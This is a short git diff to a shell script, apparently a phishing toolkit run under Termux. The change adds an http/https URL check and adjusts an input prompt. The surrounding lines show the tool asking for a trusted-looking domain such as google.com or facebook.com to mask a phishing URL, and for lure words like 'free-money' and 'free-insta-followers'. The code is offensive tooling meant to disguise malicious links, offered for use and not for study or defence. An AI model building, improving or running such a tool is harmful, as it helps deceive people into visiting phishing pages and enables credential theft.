Update termux

diff --git a/termux b/termux
--- a/termux
+++ b/termux
@@ -81,7 +81,15 @@ links() {
 }
 
 
-
+function url_checker() {
+        if [ ! "${1//:*}" = http ]; then
+	        if [ ! "${1//:*}" = https ]; then
+			echo
+                        printf "${red} Invalid URL. Please use http or https. \n "
+                        exit 1
+		fi
+	fi
+}
 
 
 # URL_SHORTNER
@@ -94,7 +102,7 @@ function url_shortner() {
 echo -e ""
 echo -e ' \e[91m[\e[92m*\e[91m]\e[93m\e[1m Domain to mask the Phishing URL \e[21m\e[0m: \e[91m(Ex:\e[96m https://google.com , http://facebook.com)\e[0m'
 echo -en "\e[32m =>\e[0m "
-        read -p $'\n\033[1;92m \033[1;93  Enter Link :\e[0m ' mask
+        read -p $' \033[1;93  Enter Link :\e[0m ' mask
         url_checker $mask
 echo -e ""
 echo -e ' \e[91m[\e[92m*\e[91m] \e[93m\e[1mType social engineering words : \e[21m\e[0m\e[91m(Ex:\e[96m like, free-money, free-insta-followers)'
